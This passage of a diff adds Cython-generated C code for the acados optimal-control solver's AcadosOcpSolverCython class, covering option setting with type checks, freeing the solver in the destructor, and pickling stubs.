__pyx_t_7, ((void *)(&__pyx_v_int_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":670 + * + * # check field availability and type + * if field_ in int_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":685 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_3 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_double_fields, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(0, 685, __pyx_L1_error) + if (__pyx_t_3) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":686 + * + * elif field_ in double_fields: + * if not isinstance(value_, float): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_3 = PyFloat_Check(__pyx_v_value_); + __pyx_t_2 = (!__pyx_t_3); + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":687 + * elif field_ in double_fields: + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * double_value = value_ + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_fl, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 687, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":686 + * + * elif field_ in double_fields: + * if not isinstance(value_, float): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":689 + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + * double_value = value_ # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + */ + __pyx_t_8 = __pyx_PyFloat_AsDouble(__pyx_v_value_); if (unlikely((__pyx_t_8 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 689, __pyx_L1_error) + __pyx_v_double_value = __pyx_t_8; + + /* "acados_template/acados_ocp_solver_pyx.pyx":690 + * + * double_value = value_ + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) # <<<<<<<<<<<<<< + * + * elif field_ in string_fields: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 690, __pyx_L1_error) + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, __pyx_t_7, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":685 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":692 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + * elif field_ in string_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_string_fields, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 692, __pyx_L1_error) + if (likely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":693 + * + * elif field_ in string_fields: + * if not isinstance(value_, bytes): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_value_); + __pyx_t_3 = (!__pyx_t_2); + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":694 + * elif field_ in string_fields: + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * string_value = value_.encode('utf-8') + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_st, __pyx_n_s_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 694, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":693 + * + * elif field_ in string_fields: + * if not isinstance(value_, bytes): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":696 + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + * string_value = value_.encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &string_value[0]) + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_encode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_kp_u_utf_8}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(__pyx_t_4, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_string_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":697 + * + * string_value = value_.encode('utf-8') + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &string_value[0]) # <<<<<<<<<<<<<< + * + * else: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 697, __pyx_L1_error) + __pyx_t_10 = 0; + __pyx_t_6 = -1; + if (__pyx_t_10 < 0) { + __pyx_t_10 += __pyx_v_string_value.shape[0]; + if (unlikely(__pyx_t_10 < 0)) __pyx_t_6 = 0; + } else if (unlikely(__pyx_t_10 >= __pyx_v_string_value.shape[0])) __pyx_t_6 = 0; + if (unlikely(__pyx_t_6 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_6); + __PYX_ERR(0, 697, __pyx_L1_error) + } + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, __pyx_t_7, ((void *)(&(*((unsigned char *) ( /* dim=0 */ ((char *) (((unsigned char *) __pyx_v_string_value.data) + __pyx_t_10)) )))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":692 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + * elif field_ in string_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":700 + * + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ # <<<<<<<<<<<<<< + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) + * + */ + /*else*/ { + + /* "acados_template/acados_ocp_solver_pyx.pyx":701 + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_options_se, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_v_int_fields, __pyx_v_double_fields); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_11 = PyNumber_Add(__pyx_t_5, __pyx_v_string_fields); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyUnicode_Join(__pyx_kp_u__29, __pyx_t_11); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_11 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_11, __pyx_v_field_, __pyx_t_5}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":700 + * + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ # <<<<<<<<<<<<<< + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) + * + */ + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 700, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 700, __pyx_L1_error) + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.options_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_int_fields); + __Pyx_XDECREF(__pyx_v_double_fields); + __Pyx_XDECREF(__pyx_v_string_fields); + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_string_value, 1); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":704 + * + * + * def __del__(self): # <<<<<<<<<<<<<< + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + */ + +/* Python wrapper */ +static void __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__ (wrapper)", 0); + __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":705 + * + * def __del__(self): + * if self.solver_created: # <<<<<<<<<<<<<< + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) + */ + if (__pyx_v_self->solver_created) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":706 + * def __del__(self): + * if self.solver_created: + * acados_solver.acados_free(self.capsule) # <<<<<<<<<<<<<< + * acados_solver.acados_free_capsule(self.capsule) + */ + (void)(long_acados_free(__pyx_v_self->capsule)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":707 + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) # <<<<<<<<<<<<<< + */ + (void)(long_acados_free_capsule(__pyx_v_self->capsule)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":705 + * + * def __del__(self): + * if self.solver_created: # <<<<<<<<<<<<<< + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":704 + * + * + * def __del__(self): # <<<<<<<<<<<<<< + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)o); + p->model_name = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->nlp_solver_type = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +#if CYTHON_USE_TP_FINALIZE +static void __pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyObject *o) { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(o); + PyErr_Restore(etype, eval, etb); +} +#endif + +static void __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyObject *o) { + struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *p = (struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)o; + #if 